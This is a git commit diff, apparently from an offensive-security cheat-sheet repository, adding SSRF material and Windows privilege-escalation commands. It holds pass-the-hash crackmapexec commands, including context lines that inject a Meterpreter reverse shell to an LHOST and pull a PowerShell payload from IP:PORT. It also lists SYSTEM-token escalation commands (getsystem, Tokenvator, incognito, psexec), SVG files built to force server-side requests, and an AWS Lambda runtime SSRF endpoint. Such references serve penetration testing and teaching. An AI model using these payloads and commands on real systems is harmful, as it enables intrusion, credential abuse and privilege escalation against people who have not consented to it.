SSRF SVG + Windows Token getsystem

2024-06-08 12:36:17 +02:00 · 2019-08-15 18:21:06 +02:00 · 2019-08-15 18:21:06 +02:00 · b6697d8595
parent 9a8b2fee8e
commit b6697d8595
8 changed files with 57 additions and 4 deletions
--- a/Resources/Active
+++ b/Resources/Active
@ -55,6 +55,7 @@
  crackmapexec smb -M name_module -o VAR=DATA
  crackmapexec 192.168.1.100 -u Jaddmon -H 5858d47a41e40b40f294b3100bea611f --local-auth
  crackmapexec 192.168.1.100 -u Jaddmon -H 5858d47a41e40b40f294b3100bea611f --shares
+  crackmapexec 192.168.1.100 -u Jaddmon -H ':5858d47a41e40b40f294b3100bea611f' -d 'DOMAIN' -M invoke_sessiongopher
  crackmapexec 192.168.1.100 -u Jaddmon -H 5858d47a41e40b40f294b3100bea611f -M rdp -o ACTION=enable
  crackmapexec 192.168.1.100 -u Jaddmon -H 5858d47a41e40b40f294b3100bea611f -M metinject -o LHOST=192.168.1.63 LPORT=4443
  crackmapexec 192.168.1.100 -u Jaddmon -H ":5858d47a41e40b40f294b3100bea611f" -M web_delivery -o URL="https://IP:PORT/posh-payload"
@ -170,13 +171,13 @@ mimikatz.exe "kerberos::ptc c:\temp\TGT_darthsidious@lab.adsecurity.org.ccache"
 :warning: If the clock is skewed use `clock-skew.nse` script from `nmap`

 ```powershell
-$ nmap -sV -sC 10.10.10.10
+Linux> $ nmap -sV -sC 10.10.10.10
 clock-skew: mean: -1998d09h03m04s, deviation: 4h00m00s, median: -1998d11h03m05s

-$ sudo date -s "14 APR 2015 18:25:16" 
+Linux> sudo date -s "14 APR 2015 18:25:16" 
+Windows> net time /domain /set
 ```

-
 ### Open Shares

 ```powershell
@ -230,6 +231,7 @@ Mount a share

 ```powershell
 smbmount //X.X.X.X/c$ /mnt/remote/ -o username=user,password=pass,rw
+sudo mount -t cifs -o username=<user>,password=<pass> //<IP>/Users folder
 ```

 ### GPO - Pivoting with Local Admin & Passwords in SYSVOL
--- a/Resources/Windows
+++ b/Resources/Windows
@ -18,6 +18,7 @@
 * [EoP - From local administrator to NT SYSTEM](#eop---from-local-administrator-to-nt-system)
 * [EoP - Living Off The Land Binaries and Scripts](#eop---living-off-the-land-binaries-and-scripts)
 * [EoP - Impersonation Privileges](#eop---impersonation-privileges)
+  * [Meterpreter getsystem and alternatives](#meterpreter-getsystem-and-alternatives)
  * [RottenPotato (Token Impersonation)](#rottenpotato-token-impersonation)
  * [Juicy Potato (abusing the golden privileges)](#juicy-potato-abusing-the-golden-privileges)
 * [EoP - Common Vulnerabilities and Exposures](#eop---common-vulnerabilities-and-exposure)
@ -662,6 +663,16 @@ Microsoft.Workflow.Compiler.exe tests.xml results.xml

 ## EoP - Impersonation Privileges

+### Meterpreter getsystem and alternatives
+
+```powershell
+meterpreter> getsystem 
+Tokenvator.exe getsystem cmd.exe 
+incognito.exe execute -c "NT AUTHORITY\SYSTEM" cmd.exe 
+psexec -s -i cmd.exe 
+python getsystem.py # from https://github.com/sailay1996/tokenx_privEsc
+```
+
 ### RottenPotato (Token Impersonation)

 Binary available at : https://github.com/foxglovesec/RottenPotato
--- a/Forgery/Files/ssrf_svg_css_import.svg
+++ b/Forgery/Files/ssrf_svg_css_import.svg
@ -0,0 +1,7 @@
+<svg xmlns="http://www.w3.org/2000/svg">
+  <style>
+    @import url(http://example.com/style.css);
+  </style>
+  <circle cx="50" cy="50" r="45" fill="green"
+          id="foo"/>
+</svg>
--- a/Forgery/Files/ssrf_svg_css_link.svg
+++ b/Forgery/Files/ssrf_svg_css_link.svg
@ -0,0 +1,6 @@
+<svg width="100%" height="100%" viewBox="0 0 100 100"
+     xmlns="http://www.w3.org/2000/svg">
+	<link xmlns="http://www.w3.org/1999/xhtml" rel="stylesheet" href="http://example.com/style.css" type="text/css"/>
+  <circle cx="50" cy="50" r="45" fill="green"
+          id="foo"/>
+</svg>
--- a/Forgery/Files/ssrf_svg_css_xmlstylesheet.svg
+++ b/Forgery/Files/ssrf_svg_css_xmlstylesheet.svg
@ -0,0 +1,6 @@
+<?xml-stylesheet href="http://example.com/style.css"?>
+<svg width="100%" height="100%" viewBox="0 0 100 100"
+     xmlns="http://www.w3.org/2000/svg">
+  <circle cx="50" cy="50" r="45" fill="green"
+          id="foo"/>
+</svg>
--- a/Forgery/Files/ssrf_svg_image.svg
+++ b/Forgery/Files/ssrf_svg_image.svg
@ -0,0 +1,4 @@
+<svg width="200" height="200"
+  xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">
+  <image xlink:href="https://example.com/image.jpg" height="200" width="200"/>
+</svg>
--- a/Forgery/Files/ssrf_svg_use.svg
+++ b/Forgery/Files/ssrf_svg_use.svg
@ -0,0 +1,4 @@
+<svg width="200" height="200"
+  xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">
+  <use xlink:href="https://example.com/file2.svg#foo"/>
+</svg>
--- a/Forgery/README.md
+++ b/Forgery/README.md
@ -32,6 +32,7 @@
 * [SSRF URL for Cloud Instances](#ssrf-url-for-cloud-instances)
  * [SSRF URL for AWS Bucket](#ssrf-url-for-aws-bucket)
  * [SSRF URL for AWS Elastic Beanstalk](#ssrf-url-for-aws-elastic-beanstalk)
+  * [SSRF URL for AWS Lambda](#ssrf-url-for-aws-lambda)
  * [SSRF URL for Google Cloud](#ssrf-url-for-google-cloud)
  * [SSRF URL for Digital Ocean](#ssrf-url-for-digital-ocean)
  * [SSRF URL for Packetcloud](#ssrf-url-for-packetcloud)
@ -441,6 +442,17 @@ http://169.254.169.254/latest/meta-data/iam/security-credentials/aws-elasticbean
 Then we use the credentials with `aws s3 ls s3://elasticbeanstalk-us-east-2-[ACCOUNT_ID]/`.


+### SSRF URL for AWS Lambda
+
+AWS Lambda provides an HTTP API for custom runtimes to receive invocation events from Lambda and send response data back within the Lambda execution environment.
+
+```powershell
+http://localhost:9001/2018-06-01/runtime/invocation/next
+$ curl "http://${AWS_LAMBDA_RUNTIME_API}/2018-06-01/runtime/invocation/next"
+```
+
+Docs: https://docs.aws.amazon.com/lambda/latest/dg/runtimes-api.html#runtimes-api-next
+
 ### SSRF URL for Google Cloud

 Requires the header "Metadata-Flavor: Google" or "X-Google-Metadata-Request: True"
@ -631,4 +643,5 @@ More info: https://rancher.com/docs/rancher/v1.6/en/rancher-services/metadata-se
 - [SSRF Protocol Smuggling in Plaintext Credential Handlers : LDAP - @0xrst](https://www.silentrobots.com/blog/2019/02/06/ssrf-protocol-smuggling-in-plaintext-credential-handlers-ldap/)
 - [X-CTF Finals 2016 - John Slick (Web 25) - YEO QUAN YANG @quanyang](https://quanyang.github.io/x-ctf-finals-2016-john-slick-web-25/)
 - [Exploiting SSRF in AWS Elastic Beanstalk - February 1, 2019 - @notsosecure](https://www.notsosecure.com/exploiting-ssrf-in-aws-elastic-beanstalk/)
- [PortSwigger - Web Security Academy Server-side request forgery (SSRF)](https://portswigger.net/web-security/ssrf)
+- [PortSwigger - Web Security Academy Server-side request forgery (SSRF)](https://portswigger.net/web-security/ssrf)
+- [SVG SSRF Cheatsheet - Allan Wirth (@allanlw) - 12/06/2019](https://github.com/allanlw/svg-cheatsheet)